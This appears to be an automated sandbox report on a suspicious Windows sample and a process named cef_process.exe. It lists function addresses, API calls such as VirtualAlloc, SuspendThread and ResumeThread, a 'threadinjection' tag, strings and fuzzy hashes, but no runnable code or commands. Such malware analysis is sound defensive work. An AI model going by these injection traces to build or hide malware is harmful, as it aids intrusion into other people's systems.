
Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 8862d2b2faa522dc360b9f7908cad52d90604d3c666e4e8ac6902477aaf39388
Instruction ID: 011dd314cadcbcda5710491bfbb4e6d002b3a7c3274f6d205b4ff7462fdf1b45
Opcode Fuzzy Hash: 8862d2b2faa522dc360b9f7908cad52d90604d3c666e4e8ac6902477aaf39388
Instruction Fuzzy Hash: 5321C07290474A5AD731EAA4D846F6BB3ECDF91750F14042EF640C3242EB65EE4893A3

Function 00CBF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00CBF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CBF2E4
Part of subcall function 00CBF2C5: GetProcAddress.KERNEL32(00CF81C8,CryptUnprotectMemory), ref: 00CBF2F4

GetCurrentProcessId.KERNEL32(?,?,?,00CBF33E), ref: 00CBF3D2

Strings

CryptProtectMemory failed, xrefs: 00CBF389
CryptUnprotectMemory failed, xrefs: 00CBF3CA

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: eaea6d55440621c69ec96f7c31ada30e620f7112ab0a3a0f6612fa56f9b1afe0
Instruction ID: 6bbc2ab15288dc369947558717607c7ca8e29920f3ed042697b8ba4d8b307ae5
Opcode Fuzzy Hash: eaea6d55440621c69ec96f7c31ada30e620f7112ab0a3a0f6612fa56f9b1afe0
Instruction Fuzzy Hash: 2B11D3316002A9ABEF159B21DC49BBE3B94FF00760F04812AFC515B361DA74AE429691

Function 00CBB991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00CBB9B8

Part of subcall function 00CB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB40A5

Strings

%c:\, xrefs: 00CBB9AE

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: 1421da440f7a70888a145fe71cc4fc97fe9f2485d57d73aa03389aa37c8065f0
Instruction ID: 7994502dce74c84f505234167fcdd911e828620d1eaa5e4acc3ee3411f36dd4d
Opcode Fuzzy Hash: 1421da440f7a70888a145fe71cc4fc97fe9f2485d57d73aa03389aa37c8065f0
Instruction Fuzzy Hash: 4501F963904311659A30AB358C85DABA7ACDE92770F40441BF554D7182EB70ED40E3B1

Function 00CB1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00CBE2E8: _swprintf.LIBCMT ref: 00CBE30E
Part of subcall function 00CBE2E8: _strlen.LIBCMT ref: 00CBE32F
Part of subcall function 00CBE2E8: SetDlgItemTextW.USER32(?,00CEE274,?), ref: 00CBE38F
Part of subcall function 00CBE2E8: GetWindowRect.USER32(?,?), ref: 00CBE3C9
Part of subcall function 00CBE2E8: GetClientRect.USER32(?,?), ref: 00CBE3D5

GetDlgItem.USER32(00000000,00003021), ref: 00CB135A
SetWindowTextW.USER32(00000000,00CE35F4), ref: 00CB1370

Strings

0, xrefs: 00CB1319

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 56cfb9f22195272cd03c0b19f049d5329cc1c71ae0e0238996829e1006409c93
Instruction ID: 8bacf54ce6d4d8992f7a378fa2cb0c9b3b2d7d19b344476585644f6910f7990f
Opcode Fuzzy Hash: 56cfb9f22195272cd03c0b19f049d5329cc1c71ae0e0238996829e1006409c93
Instruction Fuzzy Hash: 30F08C7010438CBADF150F608C1DAEA3BA8AF02346F488114FD58916A1EB75CA91AB20

Function 00CC0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00CC1101,?,?,00CC117F,?,?,?,?,?,00CC1169), ref: 00CC0FEA
GetLastError.KERNEL32(?,?,00CC117F,?,?,?,?,?,00CC1169), ref: 00CC0FF6

Part of subcall function 00CB6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB6C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00CC0FFF

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: ec03ac46aee59f05e054aaa7e0a8bb8b008db9b608e31a1e5bc415b92a58c487
Instruction ID: 53132c95fbdf932a10349e7ad62d709e74eb56b147e57b54630705ee0bf3aad1
Opcode Fuzzy Hash: ec03ac46aee59f05e054aaa7e0a8bb8b008db9b608e31a1e5bc415b92a58c487
Instruction Fuzzy Hash: B1D05B715045A476CA103325DC49FBF3D059B12731F640714F539662F6CE294A815696

Function 00CBE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00CBDA55,?), ref: 00CBE2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00CBDA55,?), ref: 00CBE2B1

Strings

RTL, xrefs: 00CBE2AB

Memory Dump Source

Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: f89ca45a78773c8c4cd603b135e332060438eb5907a01988f33bcb710385ec58
Instruction ID: 216ebbe8a6b070411d217799f4068c21958ded6782a4091406d534b3fa22634c
Opcode Fuzzy Hash: f89ca45a78773c8c4cd603b135e332060438eb5907a01988f33bcb710385ec58
Instruction Fuzzy Hash: B5C012312407D066E63067B56C4DB876A585B00B11F05045CB541EF1D1DAA9E58096A0

Analysis Process: cef_process.exePID: 7700, Parent PID: 7628COMMON

Execution Graph

Execution Coverage:	5.5%
Dynamic/Decrypted Code Coverage:	81.2%
Signature Coverage:	0%
Total number of Nodes:	16
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFAACC98B32 Relevance: 4.1, Strings: 3, Instructions: 327
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAACC98E92
r6, xrefs: 00007FFAACC98B93
r6, xrefs: 00007FFAACC98BE3

Memory Dump Source

Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd

Similarity

API ID:
String ID: r6$r6$r6
API String ID: 0-701349563
Opcode ID: 7dacf0207327399b30880ef859df755a7a5109386c63b8220d5a075a154aceda
Instruction ID: 877c6beee884ea31e3d3d5af641d09ca5e0d93ed9cf6d7b7d365b3dc17cf8c5c
Opcode Fuzzy Hash: 7dacf0207327399b30880ef859df755a7a5109386c63b8220d5a075a154aceda
Instruction Fuzzy Hash: 2DC1CF70A19A469FE749DF28C4906A4B7E1FF5A300F4481B9C04ECBA96DB2DF955CBC0

Function 00007FFAACC9E2D2 Relevance: 4.1, Strings: 3, Instructions: 327
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAACC9E333
r6, xrefs: 00007FFAACC9E383
r6, xrefs: 00007FFAACC9E632

Memory Dump Source

Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd

Similarity

API ID:
String ID: r6$r6$r6
API String ID: 0-701349563
Opcode ID: b02c19cbbec8592a3f010c2a65da1bdb1cf6bfe3a4337e63b799aa665b12083d
Instruction ID: 540f763d48fd83530b84200af97e08f42e7cedbdb7ace196a66c62cf94e23e05
Opcode Fuzzy Hash: b02c19cbbec8592a3f010c2a65da1bdb1cf6bfe3a4337e63b799aa665b12083d
Instruction Fuzzy Hash: E4C1C170A09A46CFE759DF68C0916A4B7A1FF6A300F4481BDD05EC7A86DB2DF8558BC0

Function 00007FFAACC9EA1F Relevance: 2.7, Strings: 2, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

b4, xrefs: 00007FFAACC9EEB2
T^H, xrefs: 00007FFAACC9EEF3

Memory Dump Source

Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd

Similarity

API ID:
String ID: T^H$b4
API String ID: 0-1226007302
Opcode ID: c20d184559b434ee35b43063c19b1dbea91abe75dfa158ba94455d9f57636749
Instruction ID: e9621afa0ee4c186b53cc0d19326f2ea48cbdcb2e48a6b1053e12cb16ac8ea07
Opcode Fuzzy Hash: c20d184559b434ee35b43063c19b1dbea91abe75dfa158ba94455d9f57636749
Instruction Fuzzy Hash: 4781F430919556CFEB69CF18C4916B57BA1FF66300F0485BDC45E8B69BCA3CE845CB81

Function 00007FFAACC9E7B2 Relevance: 2.7, Strings: 2, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAACC9E7D7
, xrefs: 00007FFAACC9E822

Memory Dump Source

Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd

Similarity

API ID:
String ID: $r6
API String ID: 0-2810495310
Opcode ID: cd86a01637a7b75e58248366a79c667b6edd2ed5310cf0ee4d16b25a280073a7
Instruction ID: ead7d3467bf9e117693a32203dc373275e2967b44be8184b951b1f0d337001b8
Opcode Fuzzy Hash: cd86a01637a7b75e58248366a79c667b6edd2ed5310cf0ee4d16b25a280073a7
Instruction Fuzzy Hash: 6B516C70D0965ACFEBA9DF98C4555BDB7B1EF55300F10807EC01EE7292CA3AA905CB91

Function 00007FFAACC99008 Relevance: 2.7, Strings: 2, Instructions: 153
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

, xrefs: 00007FFAACC99082
r6, xrefs: 00007FFAACC99037

Memory Dump Source

Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd

Similarity

API ID:
String ID: $r6
API String ID: 0-2810495310
Opcode ID: 60132593e7b831224097427fda194180b662be28016c0edde7156da530bd6828
Instruction ID: c752e96792c4c279bfb4c43bfed779a1f0d69edfe77edee7e7d7e2373d3ce3c6
Opcode Fuzzy Hash: 60132593e7b831224097427fda194180b662be28016c0edde7156da530bd6828
Instruction Fuzzy Hash: 83512C71D0964ACFEB58DF98C4555BDB7B1FF49300F1081BAD01EE7292CA3AA909CB91

Function 00007FFAACC97B35 Relevance: 2.6, Strings: 2, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAACC97B36
r6, xrefs: 00007FFAACC97B60

Memory Dump Source

Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd

Similarity

API ID:
String ID: r6$r6
API String ID: 0-2018302956
Opcode ID: 8b35e6e1d92a48c18f5e5e5b388c67b26767665e28777fb73e54122ed608f2ef
Instruction ID: b7eb5fd8cc33caaa50ffba6eb1e532667b72f593940efa570c697e6136685a5d
Opcode Fuzzy Hash: 8b35e6e1d92a48c18f5e5e5b388c67b26767665e28777fb73e54122ed608f2ef
Instruction Fuzzy Hash: DE31F77191EA59CFFB98DF6848126A8B7D1EF57310F4441BAD04EC36C2DD1DA80987C1

Function 00007FFAAC7404B8 Relevance: 1.7, APIs: 1, Instructions: 161
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 00007FFAAC7405B1

Memory Dump Source

Source File: 00000008.00000002.1614913483.00007FFAAC730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac730000_cef_process.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9c031a094ec2b4280035933ca6dd3fa783756e5670e31cb11b4948c3157a7d84
Instruction ID: 9f8d0c148d6cb8d0bab1ede740202dd1a242ced8a3fcca4545bf0085a093f78f
Opcode Fuzzy Hash: 9c031a094ec2b4280035933ca6dd3fa783756e5670e31cb11b4948c3157a7d84
Instruction Fuzzy Hash: B6519A7090C78C8FDB55DFA8D854AE9BFF0EF56310F0441ABD049EB292DA349886CB51

Function 00007FFAAC580758 Relevance: 1.7, APIs: 1, Instructions: 409
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 00007FFAAC593D9F

Memory Dump Source

Source File: 00000008.00000002.1612900652.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac580000_cef_process.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7ce74bb92ef507e5ece2d44df9886c071a4ec33bf82d3ad3bc2c58d1c4cac711
Instruction ID: a5031e8f76249c5eab93c30cd04c348b1579c6a4e30cdcd6e2ed352ff137867e
Opcode Fuzzy Hash: 7ce74bb92ef507e5ece2d44df9886c071a4ec33bf82d3ad3bc2c58d1c4cac711
Instruction Fuzzy Hash: B6D19F70958A4D8FEB94EF68C845AED7BF1FF59301F0041AAE40DD3252CB39A985CB81

Function 00007FFAAC580755 Relevance: 1.7, APIs: 1, Instructions: 408
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 00007FFAAC593D9F

Memory Dump Source

Source File: 00000008.00000002.1612900652.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac580000_cef_process.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1e7612bab508395b138a526065f10f94c2f30147476052d4d2f375b954289b68
Instruction ID: 8c7446534dec84b0c24cafb74dbb309c1f684672d87abd01d5ecd59ecbb3ef77
Opcode Fuzzy Hash: 1e7612bab508395b138a526065f10f94c2f30147476052d4d2f375b954289b68
Instruction Fuzzy Hash: 2AD18E70958A4D8FEB94EF68C845AEDBBF1FF59301F0041AAE40DD3252CB35A985CB81

Function 00007FFAAC73EC6D Relevance: 1.6, APIs: 1, Instructions: 139
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SuspendThread.KERNEL32 ref: 00007FFAAC73ED41

Memory Dump Source

Source File: 00000008.00000002.1614913483.00007FFAAC730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac730000_cef_process.jbxd

Similarity

API ID: SuspendThread
String ID:
API String ID: 3178671153-0
Opcode ID: 9cfd45300b17bbfed69fd1a95bbb33e5a9c715c99fb5517d5e7d40507fac52ef
Instruction ID: b9cd244febdd8dc83d1223ced436abe49ee7c1b3e2960ba35938b8bb560c3505
Opcode Fuzzy Hash: 9cfd45300b17bbfed69fd1a95bbb33e5a9c715c99fb5517d5e7d40507fac52ef
Instruction Fuzzy Hash: E541497090864C8FDB59DFA8D889BEDBBF0FB5A310F10416AD049E7292DB70A885CF41

Function 00007FFAAC742255 Relevance: 1.6, APIs: 1, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNEL32 ref: 00007FFAAC742322

Memory Dump Source

Source File: 00000008.00000002.1614913483.00007FFAAC730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac730000_cef_process.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 68826c39f5d1d14706d52e4334ff4f62667f3d440ce4647e1f7bd26af8ab8658
Instruction ID: 7d17fa100b5dc42f9a5fcca2808721908452ada9482c199e125396e535afaf5f
Opcode Fuzzy Hash: 68826c39f5d1d14706d52e4334ff4f62667f3d440ce4647e1f7bd26af8ab8658
Instruction Fuzzy Hash: 6741F874E0860C8FDB98DF98D885BEDBBF1FB5A311F10416AD44DE7252DA71A885CB40

Function 00007FFAACC96C73 Relevance: 1.6, Strings: 1, Instructions: 322
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

P~, xrefs: 00007FFAACC96DB7

Memory Dump Source

Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd

Similarity

API ID:
String ID: P~
API String ID: 0-2466740200
Opcode ID: 851edd3cd284ca2e23f56ffa96fd86590edc3c9bd1b7d83417957aa047537c76
Instruction ID: 78363848ead0e1ebec9571f4dc5509ceafe7ca495b0dd69478b1d7ea1b42b59b
Opcode Fuzzy Hash: 851edd3cd284ca2e23f56ffa96fd86590edc3c9bd1b7d83417957aa047537c76
Instruction Fuzzy Hash: AFA1B57191EA4ACFE795DF28C8556B87BE1FF56300F4481B6D04EC72A2DE29DC098781

Function 00007FFAACC952AB Relevance: 1.5, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

/, xrefs: 00007FFAACC952C6

Memory Dump Source

Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-1686368129
Opcode ID: 520c13cf9a22957d46c55d1f3235e9446e6bac64d307c5c4a16b1ac08a07e3f1
Instruction ID: 0f82d236447667f0251cb111a38b8cb89f465f16337786fcff4184009b935ff8
Opcode Fuzzy Hash: 520c13cf9a22957d46c55d1f3235e9446e6bac64d307c5c4a16b1ac08a07e3f1
Instruction Fuzzy Hash: 40819B70D1EA4ECEFB94DB6488516BC7BA0FF56300F5046BAD00ED7191DE2EA8498781

Function 00007FFAACC9C52B Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

/, xrefs: 00007FFAACC9C546

Memory Dump Source

Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-1686368129
Opcode ID: ef280797ffd6f402e0dbe81e7192c5f9f97330e881914983384bf7f8c30c0a5c
Instruction ID: c64ee8c72f4f2f3c14aa384548461d7366d98c04699c31b9623b145f26b24363
Opcode Fuzzy Hash: ef280797ffd6f402e0dbe81e7192c5f9f97330e881914983384bf7f8c30c0a5c
Instruction Fuzzy Hash: FE81BF70D1E64ACEFB54DF64C8546BCBBA1FF5A340F5084BAD00ED7192DE2EA8499780

Function 00007FFAACC969F4 Relevance: 1.5, Strings: 1, Instructions: 218COMMON

Download Yara Rule

Strings

x^, xrefs: 00007FFAACC96AD3

Memory Dump Source

Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd

Similarity

API ID:
String ID: x^
API String ID: 0-3107577783
Opcode ID: ef08afd203e7993aacec1203e5cf0c85d4d004428419a7767963e3cd42d4110a
Instruction ID: 033c3d7fb887cd5963829c44413c29407c77bb206f1a50a029d3aec69b937926
Opcode Fuzzy Hash: ef08afd203e7993aacec1203e5cf0c85d4d004428419a7767963e3cd42d4110a
Instruction Fuzzy Hash: 4A613865D1E64ACFFB959B6888115BDBBA1EF96300F44C1B6D05EC71D2EE2DAC0983C0

Function 00007FFAAC740619 Relevance: 1.4, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FFAAC7406F1

Memory Dump Source

Source File: 00000008.00000002.1614913483.00007FFAAC730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac730000_cef_process.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 2a09092247ca815c2618734a5755b14c8a5dbb65b7abd66183ae8d4662dc50bd
Instruction ID: e264fd529b57a7f577d4818ad7ea014bffa85524d7c539932424e7524755dbbb
Opcode Fuzzy Hash: 2a09092247ca815c2618734a5755b14c8a5dbb65b7abd66183ae8d4662dc50bd
Instruction Fuzzy Hash: 79416D7090865C8FEB59DFA8C884BEDBBF0EB56310F1041AAD449E7292DA749885CF41

Function 00007FFAACC99610 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

b4, xrefs: 00007FFAACC99712

Memory Dump Source

Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd

Similarity

API ID:
String ID: b4
API String ID: 0-3371602342
Opcode ID: ce1c408d99a41fd64d10f9f099ad3ff7740ccb31bcb9aa6228142c782d3bd52f
Instruction ID: 1db94ffbde360ed43a35f40cbcfb17c8bee859c39e2eafa3dd7cefdc209fdfde
Opcode Fuzzy Hash: ce1c408d99a41fd64d10f9f099ad3ff7740ccb31bcb9aa6228142c782d3bd52f
Instruction Fuzzy Hash: B341232091D55ACEFBA8DF288411AB87BA1FF95300F1485BAD00FC7196DD3DE9898B81

Function 00007FFAACC97A92 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAACC97AC7

Memory Dump Source

Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: 1ef9a84f41928ff7c1aa7adf30bed0aec26b8c6945d6115b39914cfbb0363707
Instruction ID: 8ce36d18518183c408a8af9d07bf11c7ddc78d66fe35e34df20bc001195d05c1
Opcode Fuzzy Hash: 1ef9a84f41928ff7c1aa7adf30bed0aec26b8c6945d6115b39914cfbb0363707
Instruction Fuzzy Hash: DD214B71A1A91ADFEB58DF58C4919A8F3A2FF49310B408179D04ED3692CE29BC15CBC0

Function 00007FFAACC974D2 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAACC97503

Memory Dump Source

Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: 28d655c16c6a74955d17a2dec06559889d2a72201be83adb55338851a49c77ed
Instruction ID: aa0b2f01e0c15e9575a1a94a2158633189609fb88d98fb145a6f4ffa9e103914
Opcode Fuzzy Hash: 28d655c16c6a74955d17a2dec06559889d2a72201be83adb55338851a49c77ed
Instruction Fuzzy Hash: E721F971E1991DCFDF99DF58C895AECB7B1FB58300F0041BAD00EE3291DA35A9858B40

Function 00007FFAACC9C1A2 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAACC9C1D3

Memory Dump Source

Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: 3d8002e5495229cbbb2e40a270861184aa63ff0f94f4f07fd362c991ac90a861
Instruction ID: 0c3e358715252c5dc59e6d0fb648f5e398b282e5a4a5ea7171529507ea2c04c6
Opcode Fuzzy Hash: 3d8002e5495229cbbb2e40a270861184aa63ff0f94f4f07fd362c991ac90a861
Instruction Fuzzy Hash: 9221D770E1991D8FDF98DF58C465AEDB7B1FF68301F0041BAD40EE3691CA39A9818B80

Function 00007FFAACC9D236 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

